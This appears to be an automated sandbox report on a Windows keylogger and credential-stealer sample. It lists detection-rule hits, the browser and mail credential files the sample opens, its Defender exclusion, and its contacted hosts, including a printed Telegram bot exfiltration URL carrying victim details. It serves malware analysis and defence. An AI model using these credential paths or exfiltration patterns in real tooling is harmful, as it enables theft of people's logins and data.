Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519406 Sample: VbcXXnmIwPPhh.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 4 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 46 12 other signatures 2->46 8 VbcXXnmIwPPhh.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 C:\Users\user\...\VbcXXnmIwPPhh.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 12 VbcXXnmIwPPhh.exe 15 4 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49726 TELEGRAMRU United Kingdom 12->30 32 mail.jhxkgroup.online 217.12.218.219, 49727, 49728, 49730 ITLDC-NLUA Ukraine 12->32 34 2 other IPs or domains 12->34 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
217.12.218.219
 mail.jhxkgroup.online Ukraine
21100 ITLDC-NLUA true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
mail.jhxkgroup.online 217.12.218.219 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown